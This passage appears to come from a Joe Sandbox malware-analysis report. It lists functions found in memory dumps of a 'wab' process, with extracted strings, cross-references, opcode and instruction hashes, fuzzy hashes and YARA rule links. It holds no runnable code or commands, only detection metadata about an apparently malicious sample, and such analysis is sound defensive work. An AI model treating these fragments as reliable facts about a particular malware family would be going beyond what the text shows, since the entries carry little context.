API String ID: 2538663250-632338590
Opcode ID: 50d41bf900c34a9b4b4fcbac5044538166eecbccfa27627fac9dca2aca0877f7
Instruction ID: 9b720fc81f5d8a430833f22761fd730bad42c21af22cdcba6fed3a1feedc283a
Opcode Fuzzy Hash: 50d41bf900c34a9b4b4fcbac5044538166eecbccfa27627fac9dca2aca0877f7
Instruction Fuzzy Hash: BE1130B5C00208CFCB20CF9AD549B9EFBF4AF48320F20845AD919A7210D378A944CFA1

Function 028B5F38 Relevance: 2.8, Strings: 2, Instructions: 326COMMON

Download Yara Rule

Strings

Haq, xrefs: 028B6023
Haq, xrefs: 028B6056

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: bf8d14521588cc7277ef5f6dbbc9e46e581435328e22ca73393b3f2d253272a9
Instruction ID: 193ecb438b7f5232fe2c4decddfae1d9d04898142b2430c68f47745d76148fa7
Opcode Fuzzy Hash: bf8d14521588cc7277ef5f6dbbc9e46e581435328e22ca73393b3f2d253272a9
Instruction Fuzzy Hash: 45B1D578B042259FDB169F29C854BBE7BE6AF89305F14446DE80ACB391DB34C842CB91

Function 028B6498 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

,aq, xrefs: 028B6578
,aq, xrefs: 028B656E

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: 2899bfc7505738ebd8cb3026fb20784a06e1f316158a0d5e06e796c9158c9047
Instruction ID: e75e512b590211cd6b073367a38c18888d4338fbaaefb6f5e9c92ed4be38c588
Opcode Fuzzy Hash: 2899bfc7505738ebd8cb3026fb20784a06e1f316158a0d5e06e796c9158c9047
Instruction Fuzzy Hash: E381A03CA005259FCB16CF79C8849EEBBBABF8A218B14816DD409D7366E731EC45CB51

Function 028B9C30 Relevance: 2.7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

4']q, xrefs: 028B9D6D
4']q, xrefs: 028B9D84

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: bad9df4218df829c0cf9c45b87119f07c09b3f9eacd2800b01b6f5bc8d0fb493
Instruction ID: 44559c05f13459e5ed219701104852230e515b301028440f199e173f01fe0871
Opcode Fuzzy Hash: bad9df4218df829c0cf9c45b87119f07c09b3f9eacd2800b01b6f5bc8d0fb493
Instruction Fuzzy Hash: 3951A3387042489FDB02DF69C844BAE7BE6EF89314F188469EA08CB355D775EC01CB61

Function 028B3CB1 Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

Xaq, xrefs: 028B3CCD
Xaq, xrefs: 028B3CF6

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: Xaq$Xaq
API String ID: 0-1488805882
Opcode ID: cc89b88cfbb3cc65329e3e037445820981e76c29dc04dacb8ddcf435e68b3d61
Instruction ID: e3eaff3dca1874ae19443cdbb2e64c7a1a92087893009a3270e4797be0afdd96
Opcode Fuzzy Hash: cc89b88cfbb3cc65329e3e037445820981e76c29dc04dacb8ddcf435e68b3d61
Instruction Fuzzy Hash: 1F315C3DB442654BDF1A4A7989A43FEAAA6AFC4204F1C447EE81AC3390DB75DC48C751

Function 244945C1 Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

8bq, xrefs: 24494699
TJbq, xrefs: 244946D2

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID: 8bq$TJbq
API String ID: 0-3440557903
Opcode ID: 644c9701392b7d0c0946e8205f452b866da456a0299635738b1c4870de5661c2
Instruction ID: 0bb4d4ddf34784e7ec286bf04f920c4d5da88d17d6a797d7fb468c5dfde34003
Opcode Fuzzy Hash: 644c9701392b7d0c0946e8205f452b866da456a0299635738b1c4870de5661c2
Instruction Fuzzy Hash: 0E311178B001088FCB45DBA8C580E9EBBF6EF88320F195494E505EB365DA34ED46CFA1

Function 244945F5 Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

8bq, xrefs: 24494699
TJbq, xrefs: 244946D2

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID: 8bq$TJbq
API String ID: 0-3440557903
Opcode ID: b1dd331d3a57a90346028c8b41641d3ce423e6f244b004d3e7af70a64400f6b1
Instruction ID: ccb354cd9be3c1ebbd84ddb17e4fcda77d29e9063bcd50a5356038cff4f3bd97
Opcode Fuzzy Hash: b1dd331d3a57a90346028c8b41641d3ce423e6f244b004d3e7af70a64400f6b1
Instruction Fuzzy Hash: FE311234B001088FCB45DBA8C990E9EBBB6EF88320F1954A4E505AB365DA74ED46CF91

Function 028B62F0 Relevance: 2.6, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

;m!, xrefs: 028B63B6
3w#, xrefs: 028B62F0

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 3w#$;m!
API String ID: 0-2518558843
Opcode ID: 28940ea6ae2b38d9f4d6f549721094e53d5f047e7b277799b817976b78dd3b21
Instruction ID: 73fb51f9f324dc5c93b4c70ce0ca3530e04dd2ea90f3acd333b4865ef013756b
Opcode Fuzzy Hash: 28940ea6ae2b38d9f4d6f549721094e53d5f047e7b277799b817976b78dd3b21
Instruction Fuzzy Hash: AE21F23D7446229FC7268A29C85893EB7A6EFC9755718807DD81ACB794DF34DC02CB81

Function 028B9D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4']q, xrefs: 028B9D6D
4']q, xrefs: 028B9D84

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: beccf36e85cd7b25fa73f518f7fae896dfe1c9c925b83c3007dce6c5d8e85043
Instruction ID: f4ef1629ddf0a029c6b9e893d065bff26f32a1f5d3d9ffa5cd8bbd5580b91c98
Opcode Fuzzy Hash: beccf36e85cd7b25fa73f518f7fae896dfe1c9c925b83c3007dce6c5d8e85043
Instruction Fuzzy Hash: 26F0A4393001042FDB0A1EAB9C509BEBADFEFC9360B144429FA09C7351DE65CC0187A1

Function 24494988 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

Haq, xrefs: 24494A8D

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: e222eacb57e23c3b59573a481bc329c7c9f556737eb103ea7814d9b07c95362a
Instruction ID: 5a8f169a46cac11621a013ffff1b282f19be1d6d5e3903e41579e5b25452aaef
Opcode Fuzzy Hash: e222eacb57e23c3b59573a481bc329c7c9f556737eb103ea7814d9b07c95362a
Instruction Fuzzy Hash: 3351C031B082589FCB15DFB8C854AAE7FE6EF9A300F5440AED505CB296CA348D02D761

Function 24494B48 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

Haq, xrefs: 24494B96

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: 6a14c284dd3346a0ebd4d450a4da5667ebab5d416fe7921c6601163ceb273f9a
Instruction ID: a56c4492fe6b5dd95463b5fbd73b2011c156422a704689804fb16a7411e54a00
Opcode Fuzzy Hash: 6a14c284dd3346a0ebd4d450a4da5667ebab5d416fe7921c6601163ceb273f9a
Instruction Fuzzy Hash: 7631C134B04244AFCB45EF78C890A6EBFA6FF89301F6080A9D5058B366CF359D06CB91

Function 028B9761 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

xIm!PNm!, xrefs: 028B9792, 028B97F7

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID: xIm!PNm!
API String ID: 0-2935805194
Opcode ID: 3bd636fc770c6a84cc445a3fc743b29311500bf29ab0434595a126050d432b9c
Instruction ID: 602eef6c794f348e544722b2bad6d5a72446a7d649f6b79e27826ecf371a0d95
Opcode Fuzzy Hash: 3bd636fc770c6a84cc445a3fc743b29311500bf29ab0434595a126050d432b9c
Instruction Fuzzy Hash: 0A218B38E00249AFCB06CFA5C950AEEBFB6AF48304F248069E415E73A4DB35D945CF20

Function 028BE220 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5635a35cc01d1afd23ceaad03f9dee9a155b8b88fd7cee81502f4693f6a31bd0
Instruction ID: 364b3bc44510093bb0c0ae3343b988624417a1c170eb143e50794bde25c275cd
Opcode Fuzzy Hash: 5635a35cc01d1afd23ceaad03f9dee9a155b8b88fd7cee81502f4693f6a31bd0
Instruction Fuzzy Hash: B722DD754A5242AFEB11AFB88AFC07EBF60FB1F3677756C81E05AC10419B390468CB61

Function 028BE288 Relevance: .7, Instructions: 658COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af54d2be94beb4e8c80f572cfb7f9b033a740a6cfa17d65c0ff849c06dd97b42
Instruction ID: 3d0c622233a52283710e05d130587879692c2b839de57aca68a04c6712b6ed15
Opcode Fuzzy Hash: af54d2be94beb4e8c80f572cfb7f9b033a740a6cfa17d65c0ff849c06dd97b42
Instruction Fuzzy Hash: 6922AA754A1252AFEB50AFB8DAFC03EBB64FB1F367375AC81E05AC10419B790464CB61

Function 028BE2A8 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c0fbf3d50b6f273cf5defb6d21a1f2dd660b3df82ca2a02e5df81aa48056929
Instruction ID: 075e56fb07c32dfc9f8d71a77d29dbaaa0e0135ee36454b675b9af0f390a8937
Opcode Fuzzy Hash: 9c0fbf3d50b6f273cf5defb6d21a1f2dd660b3df82ca2a02e5df81aa48056929
Instruction Fuzzy Hash: 7A129A754A1252AFEB50AFB8DAFC03EBA64FB1F367375AD81E01BC10419B790464CB61

Function 24494CE0 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57edd35d30c87a2f10114415e20f85d7c3a9e602461eaa67678b7cf6f8759e4f
Instruction ID: 839cc0258cce12a89106df78b259abce0ee2a89689155b3767708563e192dd53
Opcode Fuzzy Hash: 57edd35d30c87a2f10114415e20f85d7c3a9e602461eaa67678b7cf6f8759e4f
Instruction Fuzzy Hash: FF61127AB04206AFCF14DF6DD89099ABFF6FB88324B54866AE519D7350D731D80187A0

Function 028B80D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d063d4b773fc22089e75a3a98b7cb33a9529b37f5a5abae7ec1eba36c1cdcff2
Instruction ID: 27de7cb35bfc387bc2a2f2649434569df403a1ab97a35180867112d7f52560e5
Opcode Fuzzy Hash: d063d4b773fc22089e75a3a98b7cb33a9529b37f5a5abae7ec1eba36c1cdcff2
Instruction Fuzzy Hash: D0711B3CB406058FCB26DF6CC884AAE7BEAAF89244F1540A9E819DB371DB74DC41CB51

Function 028BF5AF Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1a1cf279a032fc1277f5e09c8ea38fd81b221a28b5798fd83657da2eb359978
Instruction ID: f434cdeb011425d65e7a0955f303687748a7aa14a54c9b433d2fca2edf9f6583
Opcode Fuzzy Hash: d1a1cf279a032fc1277f5e09c8ea38fd81b221a28b5798fd83657da2eb359978
Instruction Fuzzy Hash: 62613278D00208CFDB14DFA5C944AEDBBB2FF88304F208569D809AB365DB795946CF41

Function 028BD869 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d5a85c1dbf529f7a4be0275b29c10413d2774b63b4760cf596075527fa6a065
Instruction ID: 1d95dcfb3ce9d00a0340ce3fa54f53e42e3efd8adc8d1594a233ce37fe130e28
Opcode Fuzzy Hash: 0d5a85c1dbf529f7a4be0275b29c10413d2774b63b4760cf596075527fa6a065
Instruction Fuzzy Hash: AA51A478E01218DFDB58DFA9D98499DBBF2FF89300F249469E819AB365DB319801CF41

Function 028B41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 465b70246b3596bd204e395ad287174e15d8837d760139e19dec66163ccb7139
Instruction ID: 258ed9386948a54b82de0ef6499cb20d4118841a9099c4fe69c69d6842d55538
Opcode Fuzzy Hash: 465b70246b3596bd204e395ad287174e15d8837d760139e19dec66163ccb7139
Instruction Fuzzy Hash: 7E51A879E01208DFCB09DFA9D99099DBBF2FF89304B208469D809AB364DB35AD45CF51

Function 028BA303 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f393707189f63e186e30e8efe5acf862c2cf904229469d42def24c4db62971fb
Instruction ID: 45eedae839f0ddc1d18654e8ed508865dc3d9e4980f625f5767cacb17284e4a2
Opcode Fuzzy Hash: f393707189f63e186e30e8efe5acf862c2cf904229469d42def24c4db62971fb
Instruction Fuzzy Hash: 0B419E39A04249DFCF1ACFA8C844AEEBFB2AF49314F048559E909DB3A1D335E914CB50

Function 028B5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 033fee2672db0cb28cd3dfba6b422b103fc7d059e1ab03bee2d61f6036f77b5b
Instruction ID: 872c532631189aecfd35caa02999d2492489b8e8d1eca59489aaa8809222c05e
Opcode Fuzzy Hash: 033fee2672db0cb28cd3dfba6b422b103fc7d059e1ab03bee2d61f6036f77b5b
Instruction Fuzzy Hash: 20316F79600209EFCF169F68C854ABE3BA6EF49300F504428F919C7344DB79C961DB92

Function 028B2790 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 327e1a022b7f1d2668d07b34347d52bd8848fd72cf1786d71521516ed615dbfb
Instruction ID: 7d259b30db6774d32686009ab42a86dd81dba44d120919e83b2cd1f287503621
Opcode Fuzzy Hash: 327e1a022b7f1d2668d07b34347d52bd8848fd72cf1786d71521516ed615dbfb
Instruction Fuzzy Hash: 82319E78D452498FCB02DFA8C8446EEBFF5EF4A300F10416AD848E7359EB345955CBA6

Function 028BF4A8 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94010251ea165f80a50743449e8251ddb44688df39727aa6260597b00d1f921d
Instruction ID: 014ad82c425fd265333edbd3d765761033653fbbdeb6398741d563326fe778c8
Opcode Fuzzy Hash: 94010251ea165f80a50743449e8251ddb44688df39727aa6260597b00d1f921d
Instruction Fuzzy Hash: 8631F0B9D4424A9FCB12DFB8D8006ADBFF1FF00314F14C5AAD618DB656E73489098B82

Function 028B9B71 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 534ed0eb759f550d2a5c1cdfa1ae7adbd840b947c932030db2c3e0523f358cbc
Instruction ID: d25748371e4b31d7dab02b90371d11187dfdac9bfa9dab0f947014548ea36299
Opcode Fuzzy Hash: 534ed0eb759f550d2a5c1cdfa1ae7adbd840b947c932030db2c3e0523f358cbc
Instruction Fuzzy Hash: 3A31CE39605645EFDB12CF28C8805EEBBF5EF45311F2484AAE944DB315C331E956CBA1

Function 028B8380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7694428af50f1b1dff1324841a5d53bf37a259072fa338f98bbb26fd4ec38115
Instruction ID: 21bdbdfe47e20f28b168587476097e67cca51285a86cde5b574a6baa53257082
Opcode Fuzzy Hash: 7694428af50f1b1dff1324841a5d53bf37a259072fa338f98bbb26fd4ec38115
Instruction Fuzzy Hash: 59216D3D3002059BDB165A29C8547BE369FAFC4758F14C03DD50ACB7A4EF69C842D382

Function 028B28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231587348879840a141242fd53ac6e16a1e3610fed410adf3dca212f61cf0159
Instruction ID: 6895a9613ee99a11818c7a654f172b67fb6fd5d6092225959a61b745550f9675
Opcode Fuzzy Hash: 231587348879840a141242fd53ac6e16a1e3610fed410adf3dca212f61cf0159
Instruction Fuzzy Hash: D5217A39A00105ABCB15DA68C840AEE77A5EF9D264B20851DDC1EDB344DB34EA4BCBD2

Function 0287D554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3273747481.000000000287D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0287D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_287d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5820299188f03c2c5c3e0d6e8ace9bd4f1797fab6f1b90c2db05513e3591680
Instruction ID: 99d6dfbc5ffb2d6b53624582a5f11c146740e8fd26f4cc1f28d040dd2a9e6031
Opcode Fuzzy Hash: b5820299188f03c2c5c3e0d6e8ace9bd4f1797fab6f1b90c2db05513e3591680
Instruction Fuzzy Hash: 3921FFB9604244DFDB05DF14D9C0F26BF65FF88318F20C669E9098B256C33AD456CAA2

Function 0287D1A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3273747481.000000000287D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0287D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_287d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77945f1d783e9fe52fad88b4ef6201dc0bb1972fd399e90981452e8f170e47a7
Instruction ID: ce79a7fd876f47574a64925272a1fd89d97e40c9634212f1db5568e5107aad44
Opcode Fuzzy Hash: 77945f1d783e9fe52fad88b4ef6201dc0bb1972fd399e90981452e8f170e47a7
Instruction Fuzzy Hash: AF2145B9504204DFDB15CF14D9C0F26BF66FF98324F248169E9098B25AC33AE806C7B2

Function 0288D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3273799917.000000000288D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0288D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_288d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be66ef7c907b40a481eb5f4d88a1950731bf2356e6510af16759aa21b587fabc
Instruction ID: c8b2499ac7e1688f958fa189abff81e08df0baf909dc85014c940c2108686874
Opcode Fuzzy Hash: be66ef7c907b40a481eb5f4d88a1950731bf2356e6510af16759aa21b587fabc
Instruction Fuzzy Hash: FE21F57D5042049FDB14EF34C9C4B26BB65FB88318F20C569D94D8B392C77AD846CA62

Function 028B4285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17013d6aa835c50f7a1a53a0ae84d6abe3ff752b738f3736aa3097779b53770a
Instruction ID: d9408fc69294c80e9c14f07c0379f0a7668380ad454457a86f5d4f56c62863e3
Opcode Fuzzy Hash: 17013d6aa835c50f7a1a53a0ae84d6abe3ff752b738f3736aa3097779b53770a
Instruction Fuzzy Hash: 7431B078E41248DFCB04DFA8D9948ADBBF2FF49304B208469E809AB324D735AD45CF41

Function 028BEB79 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7caf2da5687edeffd974e59fec6c392b490b7a52c88861f5a091c9a68db0415c
Instruction ID: 459b752a18d7552562d4df27ddebf68e0e17edf0438d035e227ca87a3e81f189
Opcode Fuzzy Hash: 7caf2da5687edeffd974e59fec6c392b490b7a52c88861f5a091c9a68db0415c
Instruction Fuzzy Hash: 29216D78C40206EFCB01DFA8D8884BEBBB1FF4A302F605855E809E3251DB385565DF61

Function 028B27F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 540978601c5b90c76e38fbc9a46c1396142230d4e04132d9aa71e6152b572839
Instruction ID: e2084df0b048bbcd7461ebe8e59480274c5291b0ff03565b2aff87604e3feb8c
Opcode Fuzzy Hash: 540978601c5b90c76e38fbc9a46c1396142230d4e04132d9aa71e6152b572839
Instruction Fuzzy Hash: E0212578C0524A8FCB01DFA8D8446EEBFF0BF1A200F20516AD808F7354E7351A95CBA1

Function 24499B94 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72819dbb4fe9b62a3926f7f4a5be7097d6f37fc1cfa648da8fd845653f107ab6
Instruction ID: 9ad66071bf46399b94fd3f24539ab52299486074e00e9a0d65c4b6ffe050e3c2
Opcode Fuzzy Hash: 72819dbb4fe9b62a3926f7f4a5be7097d6f37fc1cfa648da8fd845653f107ab6
Instruction Fuzzy Hash: A31156B4A001198FDB05DBA8D884AEDBFF5FF88309F14C169E818A7346D730E941DB60

Function 244948A8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24490000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b84dd631837f22a3a9f56fe30cfdbb43226a0405d2f4b7f6f362dce3bd911c
Instruction ID: b2b7c4bae3ca4e78e487ac763b6e24a027f1f381bff75c1aa55005c462e44358
Opcode Fuzzy Hash: c9b84dd631837f22a3a9f56fe30cfdbb43226a0405d2f4b7f6f362dce3bd911c
Instruction Fuzzy Hash: D511BC353046048FCB08DF29E484E1ABBE6FF88721B1180A9E21ACB320CB70EC00CB10

Function 028B6300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba1698cbe9febfbca4539a70e0fd6f55f496c2280599d5154fa9cad7fda6f7c0
Instruction ID: 3a1367924ae443888e4628f2be6d5efde8ab63b779bc75178153c269f2ab2557
Opcode Fuzzy Hash: ba1698cbe9febfbca4539a70e0fd6f55f496c2280599d5154fa9cad7fda6f7c0
Instruction Fuzzy Hash: A211C23D3006229FC7169A2AC85493EB7AAFF89665318407CE81ACB350DF24DC028B90

Function 028BF4D0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d963743b8231cb9f98b44051554814a69ba4c657878bb45d853facc7baeba25
Instruction ID: ef25f45497343ddded05458c36fad3fa61fc9ac9873abab852cb400354ef3852
